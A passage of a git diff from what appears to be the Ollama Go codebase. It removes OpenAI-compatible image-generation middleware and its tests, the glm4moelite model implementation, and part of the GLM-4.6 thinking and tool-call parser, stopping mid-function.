+++ b/middleware/openai.go
@@ -8,7 +8,6 @@ import (
 	"math/rand"
 	"net/http"
 	"strings"
-	"time"

 	"github.com/gin-gonic/gin"

@@ -442,7 +441,6 @@ type ResponsesWriter struct {
 	stream     bool
 	responseID string
 	itemID     string
-	request    openai.ResponsesRequest
 }

 func (w *ResponsesWriter) writeEvent(eventType string, data any) error {
@@ -480,9 +478,7 @@ func (w *ResponsesWriter) writeResponse(data []byte) (int, error) {

 	// Non-streaming response
 	w.ResponseWriter.Header().Set("Content-Type", "application/json")
-	response := openai.ToResponse(w.model, w.responseID, w.itemID, chatResponse, w.request)
-	completedAt := time.Now().Unix()
-	response.CompletedAt = &completedAt
+	response := openai.ToResponse(w.model, w.responseID, w.itemID, chatResponse)
 	return len(data), json.NewEncoder(w.ResponseWriter).Encode(response)
 }

@@ -527,12 +523,11 @@ func ResponsesMiddleware() gin.HandlerFunc {

 		w := &ResponsesWriter{
 			BaseWriter: BaseWriter{ResponseWriter: c.Writer},
-			converter:  openai.NewResponsesStreamConverter(responseID, itemID, req.Model, req),
+			converter:  openai.NewResponsesStreamConverter(responseID, itemID, req.Model),
 			model:      req.Model,
 			stream:     streamRequested,
 			responseID: responseID,
 			itemID:     itemID,
-			request:    req,
 		}

 		// Set headers based on streaming mode
@@ -546,66 +541,3 @@ func ResponsesMiddleware() gin.HandlerFunc {
 		c.Next()
 	}
 }
-
-type ImageWriter struct {
-	BaseWriter
-}
-
-func (w *ImageWriter) writeResponse(data []byte) (int, error) {
-	var generateResponse api.GenerateResponse
-	if err := json.Unmarshal(data, &generateResponse); err != nil {
-		return 0, err
-	}
-
-	// Only write response when done with image
-	if generateResponse.Done && generateResponse.Image != "" {
-		w.ResponseWriter.Header().Set("Content-Type", "application/json")
-		return len(data), json.NewEncoder(w.ResponseWriter).Encode(openai.ToImageGenerationResponse(generateResponse))
-	}
-
-	return len(data), nil
-}
-
-func (w *ImageWriter) Write(data []byte) (int, error) {
-	code := w.ResponseWriter.Status()
-	if code != http.StatusOK {
-		return w.writeError(data)
-	}
-
-	return w.writeResponse(data)
-}
-
-func ImageGenerationsMiddleware() gin.HandlerFunc {
-	return func(c *gin.Context) {
-		var req openai.ImageGenerationRequest
-		if err := c.ShouldBindJSON(&req); err != nil {
-			c.AbortWithStatusJSON(http.StatusBadRequest, openai.NewError(http.StatusBadRequest, err.Error()))
-			return
-		}
-
-		if req.Prompt == "" {
-			c.AbortWithStatusJSON(http.StatusBadRequest, openai.NewError(http.StatusBadRequest, "prompt is required"))
-			return
-		}
-
-		if req.Model == "" {
-			c.AbortWithStatusJSON(http.StatusBadRequest, openai.NewError(http.StatusBadRequest, "model is required"))
-			return
-		}
-
-		var b bytes.Buffer
-		if err := json.NewEncoder(&b).Encode(openai.FromImageGenerationRequest(req)); err != nil {
-			c.AbortWithStatusJSON(http.StatusInternalServerError, openai.NewError(http.StatusInternalServerError, err.Error()))
-			return
-		}
-
-		c.Request.Body = io.NopCloser(&b)
-
-		w := &ImageWriter{
-			BaseWriter: BaseWriter{ResponseWriter: c.Writer},
-		}
-
-		c.Writer = w
-		c.Next()
-	}
-}
--- a/middleware/openai_test.go
+++ b/middleware/openai_test.go
@@ -961,154 +961,3 @@ func TestRetrieveMiddleware(t *testing.T) {
 		}
 	}
 }
-
-func TestImageGenerationsMiddleware(t *testing.T) {
-	type testCase struct {
-		name string
-		body string
-		req  api.GenerateRequest
-		err  openai.ErrorResponse
-	}
-
-	var capturedRequest *api.GenerateRequest
-
-	testCases := []testCase{
-		{
-			name: "image generation basic",
-			body: `{
-				"model": "test-model",
-				"prompt": "a beautiful sunset"
-			}`,
-			req: api.GenerateRequest{
-				Model:  "test-model",
-				Prompt: "a beautiful sunset",
-			},
-		},
-		{
-			name: "image generation with size",
-			body: `{
-				"model": "test-model",
-				"prompt": "a beautiful sunset",
-				"size": "512x768"
-			}`,
-			req: api.GenerateRequest{
-				Model:  "test-model",
-				Prompt: "a beautiful sunset",
-				Width:  512,
-				Height: 768,
-			},
-		},
-		{
-			name: "image generation missing prompt",
-			body: `{
-				"model": "test-model"
-			}`,
-			err: openai.ErrorResponse{
-				Error: openai.Error{
-					Message: "prompt is required",
-					Type:    "invalid_request_error",
-				},
-			},
-		},
-		{
-			name: "image generation missing model",
-			body: `{
-				"prompt": "a beautiful sunset"
-			}`,
-			err: openai.ErrorResponse{
-				Error: openai.Error{
-					Message: "model is required",
-					Type:    "invalid_request_error",
-				},
-			},
-		},
-	}
-
-	endpoint := func(c *gin.Context) {
-		c.Status(http.StatusOK)
-	}
-
-	gin.SetMode(gin.TestMode)
-	router := gin.New()
-	router.Use(ImageGenerationsMiddleware(), captureRequestMiddleware(&capturedRequest))
-	router.Handle(http.MethodPost, "/api/generate", endpoint)
-
-	for _, tc := range testCases {
-		t.Run(tc.name, func(t *testing.T) {
-			req, _ := http.NewRequest(http.MethodPost, "/api/generate", strings.NewReader(tc.body))
-			req.Header.Set("Content-Type", "application/json")
-
-			defer func() { capturedRequest = nil }()
-
-			resp := httptest.NewRecorder()
-			router.ServeHTTP(resp, req)
-
-			if tc.err.Error.Message != "" {
-				var errResp openai.ErrorResponse
-				if err := json.Unmarshal(resp.Body.Bytes(), &errResp); err != nil {
-					t.Fatal(err)
-				}
-				if diff := cmp.Diff(tc.err, errResp); diff != "" {
-					t.Fatalf("errors did not match:\n%s", diff)
-				}
-				return
-			}
-
-			if resp.Code != http.StatusOK {
-				t.Fatalf("expected status 200, got %d: %s", resp.Code, resp.Body.String())
-			}
-
-			if diff := cmp.Diff(&tc.req, capturedRequest); diff != "" {
-				t.Fatalf("requests did not match:\n%s", diff)
-			}
-		})
-	}
-}
-
-func TestImageWriterResponse(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	// Test that ImageWriter transforms GenerateResponse to OpenAI format
-	endpoint := func(c *gin.Context) {
-		resp := api.GenerateResponse{
-			Model:     "test-model",
-			CreatedAt: time.Unix(1234567890, 0).UTC(),
-			Done:      true,
-			Image:     "dGVzdC1pbWFnZS1kYXRh", // base64 of "test-image-data"
-		}
-		data, _ := json.Marshal(resp)
-		c.Writer.Write(append(data, '\n'))
-	}
-
-	router := gin.New()
-	router.Use(ImageGenerationsMiddleware())
-	router.Handle(http.MethodPost, "/api/generate", endpoint)
-
-	body := `{"model": "test-model", "prompt": "test"}`
-	req, _ := http.NewRequest(http.MethodPost, "/api/generate", strings.NewReader(body))
-	req.Header.Set("Content-Type", "application/json")
-
-	resp := httptest.NewRecorder()
-	router.ServeHTTP(resp, req)
-
-	if resp.Code != http.StatusOK {
-		t.Fatalf("expected status 200, got %d: %s", resp.Code, resp.Body.String())
-	}
-
-	var imageResp openai.ImageGenerationResponse
-	if err := json.Unmarshal(resp.Body.Bytes(), &imageResp); err != nil {
-		t.Fatalf("failed to unmarshal response: %v", err)
-	}
-
-	if imageResp.Created != 1234567890 {
-		t.Errorf("expected created 1234567890, got %d", imageResp.Created)
-	}
-
-	if len(imageResp.Data) != 1 {
-		t.Fatalf("expected 1 image, got %d", len(imageResp.Data))
-	}
-
-	if imageResp.Data[0].B64JSON != "dGVzdC1pbWFnZS1kYXRh" {
-		t.Errorf("expected image data 'dGVzdC1pbWFnZS1kYXRh', got %s", imageResp.Data[0].B64JSON)
-	}
-}
--- a/model/models/glm4moelite/model.go
+++ b/model/models/glm4moelite/model.go
@@ -1,304 +0,0 @@
-package glm4moelite
-
-import (
-	"math"
-
-	"github.com/ollama/ollama/fs"
-	"github.com/ollama/ollama/kvcache"
-	"github.com/ollama/ollama/ml"
-	"github.com/ollama/ollama/ml/nn"
-	"github.com/ollama/ollama/model"
-	"github.com/ollama/ollama/model/input"
-)
-
-type Options struct {
-	numExpertsUsed      int
-	numExperts          int
-	normTopKProb        bool
-	routedScalingFactor float32
-
-	kvLoraRank,
-	qkNopeHeadDim,
-	qkRopeHeadDim,
-	kqNopeHeadDim,
-	qkHeadDim int
-	qLoraRank int
-	vHeadDim  int
-
-	hiddenSize,
-	numHeads,
-	numKVHeads int
-
-	eps,
-	ropeBase float32
-	kqScale float64
-}
-
-func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, t, p ml.Tensor) ml.Tensor {
-	return nn.RoPE(ctx, t, p, o.qkRopeHeadDim, o.ropeBase, 1.0)
-}
-
-type Attention struct {
-	Q *nn.Linear `gguf:"attn_q"`
-
-	QA     *nn.Linear  `gguf:"attn_q_a"`
-	QANorm *nn.RMSNorm `gguf:"attn_q_a_norm"`
-	QB     *nn.Linear  `gguf:"attn_q_b"`
-
-	KVA     *nn.Linear  `gguf:"attn_kv_a_mqa"`
-	KVANorm *nn.RMSNorm `gguf:"attn_kv_a_norm"`
-	KVB     *nn.Linear  `gguf:"attn_kv_b"`
-
-	Output *nn.Linear `gguf:"attn_out,alt:attn_output"`
-}
-
-func (attn *Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor {
-	seqLength := hiddenStates.Dim(1)
-
-	var query ml.Tensor
-	if opts.qLoraRank == 0 {
-		query = attn.Q.Forward(ctx, hiddenStates)
-	} else {
-		query = attn.QA.Forward(ctx, hiddenStates)
-		query = attn.QANorm.Forward(ctx, query, opts.eps)
-		query = attn.QB.Forward(ctx, query)
-	}
-
-	query = query.Reshape(ctx, query.Dim(0)/opts.numHeads, opts.numHeads, seqLength)
-	queryChunks := query.ChunkSections(ctx, 0, opts.qkNopeHeadDim, opts.qkRopeHeadDim)
-
-	compressedKV := attn.KVA.Forward(ctx, hiddenStates)
-	kPass := compressedKV.Slice(ctx, 0, 0, opts.kvLoraRank, 1)
-	kRot := compressedKV.View(ctx,
-		opts.kvLoraRank*compressedKV.Stride(0), opts.qkRopeHeadDim,
-		compressedKV.Stride(1), 1,
-		compressedKV.Stride(1), compressedKV.Dim(1),
-	)
-
-	qRot := opts.applyRotaryPositionEmbeddings(ctx, queryChunks[1], positions)
-	kRot = opts.applyRotaryPositionEmbeddings(ctx, kRot, positions)
-	kPass = attn.KVANorm.Forward(ctx, kPass, opts.eps)
-	kPass = attn.KVB.Forward(ctx, kPass)
-
-	kv := kPass.Reshape(ctx, kPass.Dim(0)/opts.numKVHeads, opts.numKVHeads, seqLength)
-	kvChunks := kv.ChunkSections(ctx, 0, opts.kqNopeHeadDim, opts.vHeadDim)
-
-	kRot = kRot.Repeat(ctx, 1, queryChunks[0].Dim(1))
-	query = qRot.Concat(ctx, queryChunks[0], 0)
-	key := kRot.Concat(ctx, kvChunks[0], 0)
-	attention := nn.Attention(ctx, query, key, kvChunks[1], opts.kqScale, cache)
-
-	attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), seqLength)
-	return attn.Output.Forward(ctx, attention)
-}
-
-type MLP interface {
-	Forward(ml.Context, ml.Tensor, *Options) ml.Tensor
-}
-
-type sparse struct {
-	Router       *nn.Linear `gguf:"ffn_gate_inp"`
-	Gate         *nn.Linear `gguf:"ffn_gate_exps"`
-	Up           *nn.Linear `gguf:"ffn_up_exps"`
-	Down         *nn.Linear `gguf:"ffn_down_exps"`
-	SharedExpert *dense     `gguf:",suf:_shexp"`
-	ExpProbsBias ml.Tensor  `gguf:"exp_probs_b.bias,alt:exp_probs_b"`
-}
-
-func (moe *sparse) Moe(ctx ml.Context, hiddenStates, topKIndices, topKWeights ml.Tensor, opts *Options) ml.Tensor {
-	hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1))
-
-	upStates := moe.Up.Weight.MulmatID(ctx, hiddenStates, topKIndices)
-	hiddenStates = moe.Gate.Weight.MulmatID(ctx, hiddenStates, topKIndices)
-	hiddenStates = hiddenStates.SILU(ctx, upStates)
-
-	experts := moe.Down.Weight.MulmatID(ctx, hiddenStates, topKIndices)
-	experts = experts.Mul(ctx, topKWeights)
-
-	nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2))
-	for i := 1; i < opts.numExpertsUsed; i++ {
-		nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2)))
-	}
-	return nextStates
-}
-
-func (moe *sparse) topKIndices(ctx ml.Context, scores ml.Tensor, opts *Options) ml.Tensor {
-	if moe.ExpProbsBias != nil {
-		scores = scores.Add(ctx, moe.ExpProbsBias)
-	}
-	topKIndices := scores.TopK(ctx, opts.numExpertsUsed)
-	return topKIndices
-}
-
-func (moe *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor {
-	residuals := hiddenStates
-
-	routerLogits := moe.Router.Forward(ctx, hiddenStates)
-	scores := routerLogits.Sigmoid(ctx)
-	topKIndices := moe.topKIndices(ctx, scores, opts)
-	topKWeights := scores.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, topKIndices)
-
-	if opts.normTopKProb {
-		topKWeights = topKWeights.Reshape(ctx, opts.numExpertsUsed, hiddenStates.Dim(1))
-		topKWeights = topKWeights.Div(ctx, topKWeights.SumRows(ctx))
-		topKWeights = topKWeights.Reshape(ctx, 1, opts.numExpertsUsed, hiddenStates.Dim(1))
-	}
-
-	topKWeights = topKWeights.Scale(ctx, float64(opts.routedScalingFactor))
-	hiddenStates = moe.Moe(ctx, hiddenStates, topKIndices, topKWeights, opts)
-	sharedExpertResult := moe.SharedExpert.Forward(ctx, residuals, opts)
-
-	hiddenStates = hiddenStates.Add(ctx, sharedExpertResult)
-	return hiddenStates
-}
-
-type dense struct {
-	Gate *nn.Linear `gguf:"ffn_gate"`
-	Up   *nn.Linear `gguf:"ffn_up"`
-	Down *nn.Linear `gguf:"ffn_down"`
-}
-
-func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor {
-	hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates))
-	return mlp.Down.Forward(ctx, hiddenStates)
-}
-
-type Layer struct {
-	AttentionNorm *nn.RMSNorm `gguf:"attn_norm"`
-	Attention     *Attention
-
-	MLPNorm *nn.RMSNorm `gguf:"ffn_norm"`
-	MLP     MLP
-}
-
-func (t *Layer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor {
-	residual := hiddenStates
-	hiddenStates = t.AttentionNorm.Forward(ctx, hiddenStates, opts.eps)
-	hiddenStates = t.Attention.Forward(ctx, hiddenStates, positions, cache, opts)
-
-	if outputs != nil {
-		hiddenStates = hiddenStates.Rows(ctx, outputs)
-		residual = residual.Rows(ctx, outputs)
-	}
-
-	hiddenStates = hiddenStates.Add(ctx, residual)
-	residual = hiddenStates
-
-	hiddenStates = t.MLPNorm.Forward(ctx, hiddenStates, opts.eps)
-	hiddenStates = t.MLP.Forward(ctx, hiddenStates, opts)
-	hiddenStates = hiddenStates.Add(ctx, residual)
-	return hiddenStates
-}
-
-type Model struct {
-	model.Base
-	model.BytePairEncoding
-
-	TokenEmbedding *nn.Embedding `gguf:"token_embd"`
-	Layers         []Layer       `gguf:"blk"`
-
-	OutputNorm *nn.RMSNorm `gguf:"output_norm"`
-	Output     *nn.Linear  `gguf:"output,alt:token_embd"`
-
-	*Options
-}
-
-func New(c fs.Config) (model.Model, error) {
-	layers := make([]Layer, c.Uint("block_count"))
-
-	firstDenseLayerIndex := int(c.Uint("leading_dense_block_count"))
-	for i := range layers {
-		if i < firstDenseLayerIndex {
-			layers[i].MLP = &dense{}
-		} else {
-			layers[i].MLP = &sparse{}
-		}
-	}
-
-	keyLength := int(c.Uint("attention.key_length"))
-	valueLength := int(c.Uint("attention.value_length"))
-
-	kqScale := 1.0 / math.Sqrt(float64(keyLength))
-
-	var pre []string
-	switch c.String("tokenizer.ggml.pre") {
-	case "glm4":
-		pre = []string{
-			`(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}{1,3}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`,
-		}
-	default:
-		return nil, model.ErrUnsupportedTokenizer
-	}
-
-	m := Model{
-		BytePairEncoding: model.NewBytePairEncoding(
-			&model.Vocabulary{
-				Values: c.Strings("tokenizer.ggml.tokens"),
-				Types:  c.Ints("tokenizer.ggml.token_type"),
-				Merges: c.Strings("tokenizer.ggml.merges"),
-				AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true),
-				BOS:    []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))},
-				AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false),
-				EOS: append(
-					[]int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))},
-					c.Ints("tokenizer.ggml.eos_token_ids")...,
-				),
-			},
-			pre...,
-		),
-		Layers: layers,
-		Options: &Options{
-			hiddenSize:     int(c.Uint("embedding_length")),
-			numHeads:       int(c.Uint("attention.head_count")),
-			numKVHeads:     int(c.Uint("attention.head_count_kv")),
-			eps:            c.Float("attention.layer_norm_rms_epsilon"),
-			ropeBase:       c.Float("rope.freq_base"),
-			numExperts:     int(c.Uint("expert_count")),
-			numExpertsUsed: int(c.Uint("expert_used_count")),
-			normTopKProb:   c.Bool("expert_weights_norm", true),
-
-			qLoraRank:     int(c.Uint("attention.q_lora_rank")),
-			kvLoraRank:    int(c.Uint("attention.kv_lora_rank")),
-			qkHeadDim:     keyLength,
-			vHeadDim:      valueLength,
-			qkRopeHeadDim: int(c.Uint("rope.dimension_count")),
-			qkNopeHeadDim: keyLength - int(c.Uint("rope.dimension_count")),
-			kqNopeHeadDim: keyLength - int(c.Uint("rope.dimension_count")),
-
-			routedScalingFactor: c.Float("expert_weights_scale"),
-
-			kqScale: kqScale,
-		},
-	}
-
-	m.Cache = kvcache.NewCausalCache(m.Shift)
-	return &m, nil
-}
-
-func (m Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) {
-	return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil
-}
-
-func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) {
-	positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions))
-
-	hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs)
-
-	for i, layer := range m.Layers {
-		m.Cache.SetLayer(i)
-
-		var outputs ml.Tensor
-		if i == len(m.Layers)-1 {
-			outputs = batch.Outputs
-		}
-
-		hiddenStates = layer.Forward(ctx, hiddenStates, positions, outputs, m.Cache, m.Options)
-	}
-
-	hiddenStates = m.OutputNorm.Forward(ctx, hiddenStates, m.eps)
-	return m.Output.Forward(ctx, hiddenStates), nil
-}
-
-func init() {
-	model.Register("glm4moelite", New)
-}
--- a/model/models/models.go
+++ b/model/models/models.go
@@ -7,7 +7,6 @@ import (
 	_ "github.com/ollama/ollama/model/models/gemma2"
 	_ "github.com/ollama/ollama/model/models/gemma3"
 	_ "github.com/ollama/ollama/model/models/gemma3n"
-	_ "github.com/ollama/ollama/model/models/glm4moelite"
 	_ "github.com/ollama/ollama/model/models/gptoss"
 	_ "github.com/ollama/ollama/model/models/llama"
 	_ "github.com/ollama/ollama/model/models/llama4"
--- a/model/parsers/glm46.go
+++ b/model/parsers/glm46.go
@@ -1,410 +0,0 @@
-package parsers
-
-import (
-	"context"
-	"encoding/xml"
-	"fmt"
-	"log/slog"
-	"strings"
-	"unicode"
-
-	"github.com/ollama/ollama/api"
-	"github.com/ollama/ollama/logutil"
-)
-
-type glm46ParserState int
-
-const (
-	glm46ParserState_LookingForThinkingOpen glm46ParserState = iota
-	glm46ParserState_ThinkingStartedEatingWhitespace
-	glm46ParserState_CollectingThinking
-	glm46ParserState_ThinkingDoneEatingWhitespace
-	glm46ParserState_CollectingContent
-	glm46ParserState_ToolStartedEatingWhitespace
-	glm46ParserState_CollectingToolContent
-)
-
-const (
-	glm46ThinkingOpenTag  = "<think>"
-	glm46ThinkingCloseTag = "</think>"
-	glm46ToolOpenTag      = "<tool_call>"
-	glm46ToolCloseTag     = "</tool_call>"
-)
-
-type GLM46Parser struct {
-	state  glm46ParserState
-	buffer strings.Builder
-	tools  []api.Tool
-}
-
-func (p *GLM46Parser) HasToolSupport() bool {
-	return true
-}
-
-func (p *GLM46Parser) HasThinkingSupport() bool {
-	return true
-}
-
-// func (p *GLM46Parser) Init(tools []api.Tool, lastMessage *api.Message) []api.Tool {
-func (p *GLM46Parser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool {
-	p.tools = tools
-	return tools
-}
-
-type glm46Event interface {
-	isGLM46Event()
-}
-
-type glm46EventContent struct {
-	content string
-}
-
-func (glm46EventContent) isGLM46Event() {}
-
-type glm46EventRawToolCall struct {
-	raw string
-}
-
-func (glm46EventRawToolCall) isGLM46Event() {}
-
-type glm46EventThinkingContent struct {
-	content string
-}
-
-func (glm46EventThinkingContent) isGLM46Event() {}
-
-func (p *GLM46Parser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) {
-	p.buffer.WriteString(s)
-	events := p.parseEvents()
-
-	var toolCalls []api.ToolCall
-	var contentSb strings.Builder
-	var thinkingSb strings.Builder
-
-	for _, event := range events {
-		switch event := event.(type) {
-		case glm46EventRawToolCall:
-			toolCall, err := parseGLM46ToolCall(event, p.tools)
-			if err != nil {
-				slog.Warn("glm-4.6 tool call parsing failed", "error", err)
-				return "", "", nil, err
-			}
-			toolCalls = append(toolCalls, toolCall)
-		case glm46EventThinkingContent:
-			thinkingSb.WriteString(event.content)
-		case glm46EventContent:
-			// TODO(drifkin): if the same turn contains multiple interleaved content
-			// events, we naively append them together here.
-			contentSb.WriteString(event.content)
-		}
-	}
-
-	return contentSb.String(), thinkingSb.String(), toolCalls, nil
-}
-
-func (p *GLM46Parser) parseEvents() []glm46Event {
-	var all []glm46Event
-
-	keepLooping := true
-	for keepLooping {
-		var events []glm46Event
-		events, keepLooping = p.eat()
-		if len(events) > 0 {
-			all = append(all, events...)
-		}
-	}
-
-	if len(all) > 0 {
-		slog.Log(context.TODO(), logutil.LevelTrace, "glm-4.6 events parsed", "events", all, "state", p.state, "buffer", p.buffer.String())
-	}
-
-	return all
-}
-
-// eatLeadingWhitespaceAndTransitionTo consumes leading whitespace from the buffer
-// and transitions to the next state. Returns (nil, false) if only whitespace remains
-// in the buffer (needs more input), or (nil, true) if we successfully transitioned.
-func (p *GLM46Parser) eatLeadingWhitespaceAndTransitionTo(nextState glm46ParserState) ([]glm46Event, bool) {
-	trimmed := strings.TrimLeftFunc(p.buffer.String(), unicode.IsSpace)
-	p.buffer.Reset()
-	if trimmed == "" {
-		return nil, false // Still only whitespace, keep waiting for more input
-	}
-	p.state = nextState
-	p.buffer.WriteString(trimmed)
-	return nil, true // Successfully transitioned
-}
-
-// glm46SplitAtTag splits the buffer at the given tag, returns the content before (trimmed of trailing whitespace),
-// the content after (optionally trimmed of leading whitespace), and updates the buffer
-func glm46SplitAtTag(p *GLM46Parser, tag string, trimAfter bool) (string, string) {
-	split := strings.SplitN(p.buffer.String(), tag, 2)
-	before := split[0]
-	before = strings.TrimRightFunc(before, unicode.IsSpace)
-	after := split[1]
-	if trimAfter {
-		after = strings.TrimLeftFunc(after, unicode.IsSpace)
-	}
-	p.buffer.Reset()
-	p.buffer.WriteString(after)
-	return before, after
-}
-
-func (p *GLM46Parser) eat() ([]glm46Event, bool) {
-	var events []glm46Event
-
-	switch p.state {
-	case glm46ParserState_LookingForThinkingOpen:
-		trimmed := strings.TrimLeftFunc(p.buffer.String(), unicode.IsSpace)
-		if strings.HasPrefix(trimmed, glm46ThinkingOpenTag) {
-			// Found <think> opening tag
-			after := strings.TrimPrefix(trimmed, glm46ThinkingOpenTag)
-			after = strings.TrimLeftFunc(after, unicode.IsSpace)
-			p.buffer.Reset()
-			p.buffer.WriteString(after)
-			if after == "" {
-				p.state = glm46ParserState_ThinkingStartedEatingWhitespace
-			} else {
-				p.state = glm46ParserState_CollectingThinking
-			}
-			return events, true
-		} else if strings.HasPrefix(glm46ThinkingOpenTag, trimmed) {
-			// Partial opening tag seen, keep accumulating
-			return events, false
-		} else if trimmed == "" {
-			// Only whitespace, keep accumulating
-			return events, false
-		} else {
-			// No thinking tag found, skip to content collection
-			p.state = glm46ParserState_CollectingContent
-			// Don't trim - we want to keep the original content
-			return events, true
-		}
-
-	case glm46ParserState_ThinkingStartedEatingWhitespace:
-		return p.eatLeadingWhitespaceAndTransitionTo(glm46ParserState_CollectingThinking)
-
-	case glm46ParserState_CollectingThinking:
-		acc := p.buffer.String()
-		if strings.Contains(acc, glm46ThinkingCloseTag) {
-			thinking, remaining := glm46SplitAtTag(p, glm46ThinkingCloseTag, true)
-			if len(thinking) > 0 {
-				events = append(events, glm46EventThinkingContent{content: thinking})
-			}
-			if remaining == "" {
-				p.state = glm46ParserState_ThinkingDoneEatingWhitespace
-			} else {
-				p.state = glm46ParserState_CollectingContent
-			}
-			return events, true
-		} else if overlapLen := overlap(acc, glm46ThinkingCloseTag); overlapLen > 0 {
-			// Partial closing tag - withhold it along with any trailing whitespace before it
-			beforePartialTag := acc[:len(acc)-overlapLen]
-			trailingWhitespaceLen := trailingWhitespaceLen(beforePartialTag)
-			ambiguousStart := len(beforePartialTag) - trailingWhitespaceLen
-
-			unambiguous := acc[:ambiguousStart]
-			ambiguous := acc[ambiguousStart:]
-			p.buffer.Reset()
-			p.buffer.WriteString(ambiguous)
-			if len(unambiguous) > 0 {
-				events = append(events, glm46EventThinkingContent{content: unambiguous})
-			}
-			return events, false
-		} else {
-			// Pure thinking content - withhold trailing whitespace (might precede closing tag)
-			whitespaceLen := trailingWhitespaceLen(acc)
-			ambiguousStart := len(acc) - whitespaceLen
-
-			unambiguous := acc[:ambiguousStart]
-			ambiguous := acc[ambiguousStart:]
-			p.buffer.Reset()
-			p.buffer.WriteString(ambiguous)
-			if len(unambiguous) > 0 {
-				events = append(events, glm46EventThinkingContent{content: unambiguous})
-			}
-			return events, false
-		}
-
-	case glm46ParserState_ThinkingDoneEatingWhitespace:
-		return p.eatLeadingWhitespaceAndTransitionTo(glm46ParserState_CollectingContent)
-
-	case glm46ParserState_CollectingContent:
-		if strings.Contains(p.buffer.String(), glm46ToolOpenTag) {
-			before, after := glm46SplitAtTag(p, glm46ToolOpenTag, true)
-			if len(before) > 0 {
-				events = append(events, glm46EventContent{content: before})
-			}
-			if after == "" {
-				p.state = glm46ParserState_ToolStartedEatingWhitespace
-			} else {
-				p.state = glm46ParserState_CollectingToolContent
-			}
-			return events, true
-		} else if overlapLen := overlap(p.buffer.String(), glm46ToolOpenTag); overlapLen > 0 {
-			beforePartialTag := p.buffer.String()[:len(p.buffer.String())-overlapLen]
-			trailingWhitespaceLen := trailingWhitespaceLen(beforePartialTag)
-			ambiguousStart := len(beforePartialTag) - trailingWhitespaceLen
-
-			unambiguous := p.buffer.String()[:ambiguousStart]
-			ambiguous := p.buffer.String()[ambiguousStart:]
-			p.buffer.Reset()
-			p.buffer.WriteString(ambiguous)
-			if len(unambiguous) > 0 {
-				events = append(events, glm46EventContent{content: unambiguous})
-			}
-			return events, false
-		} else {
-			whitespaceLen := trailingWhitespaceLen(p.buffer.String())
-			ambiguousStart := len(p.buffer.String()) - whitespaceLen
-
-			unambiguous := p.buffer.String()[:ambiguousStart]
-			ambiguous := p.buffer.String()[ambiguousStart:]
-			p.buffer.Reset()
-			p.buffer.WriteString(ambiguous)
-			if len(unambiguous) > 0 {
-				events = append(events, glm46EventContent{content: unambiguous})
-			}
-			return events, false
-		}
-
-	case glm46ParserState_ToolStartedEatingWhitespace:
-		return p.eatLeadingWhitespaceAndTransitionTo(glm46ParserState_CollectingToolContent)
-
-	case glm46ParserState_CollectingToolContent:
-		acc := p.buffer.String()
-		if strings.Contains(acc, glm46ToolCloseTag) {
-			toolContent, _ := glm46SplitAtTag(p, glm46ToolCloseTag, true)
-			if len(toolContent) == 0 {
-				slog.Warn("glm46 tool call closing tag found but no content before it")
-			}
-			events = append(events, glm46EventRawToolCall{raw: toolContent})
-			p.state = glm46ParserState_CollectingContent
-			return events, true
-		} else {
-			// Keep accumulating - tool calls are not streamed
-			// We just wait for the closing tag
-			return events, false
-		}
-
-	default:
-		panic("unreachable")
-	}
-}
-
-// GLMToolCallXML represents the structure of a GLM-4.6 tool call for XML parsing
-type GLMToolCallXML struct {
-	XMLName xml.Name `xml:"tool_call"`
-	Content string   `xml:",chardata"` // Function name (text nodes between tags)
-	Keys    []string `xml:"arg_key"`   // All arg_key elements in document order
-	Values  []string `xml:"arg_value"` // All arg_value elements in document order
-}
-
-// escapeGLM46Content escapes XML entities in text content while preserving arg_key/arg_value tags
-func escapeGLM46Content(s string) string {
-	var result strings.Builder
-	inTag := false
-
-	for i := range len(s) {
-		ch := s[i]
-
-		if ch == '<' {
-			// Check if this is a known tag
-			if strings.HasPrefix(s[i:], "<arg_key>") ||
-				strings.HasPrefix(s[i:], "</arg_key>") ||
-				strings.HasPrefix(s[i:], "<arg_value>") ||
-				strings.HasPrefix(s[i:], "</arg_value>") {
-				inTag = true
-			}
-		}
-
-		if inTag {
-			result.WriteByte(ch)
-			if ch == '>' {
-				inTag = false
-			}
-		} else {
-			// Escape special characters in text content
-			switch ch {
-			case '&':
-				result.WriteString("&amp;")
-			case '<':
-				result.WriteString("&lt;")
-			case '>':
-				result.WriteString("&gt;")
-			default:
-				result.WriteByte(ch)
-			}
-		}
-	}
-
-	return result.String()
-}
-
-func parseGLM46ToolCall(raw glm46EventRawToolCall, tools []api.Tool) (api.ToolCall, error) {
-	// Escape any unescaped entities in text content
-	// We need to escape text between tags, but not the tags themselves
-	escaped := escapeGLM46Content(raw.raw)
-
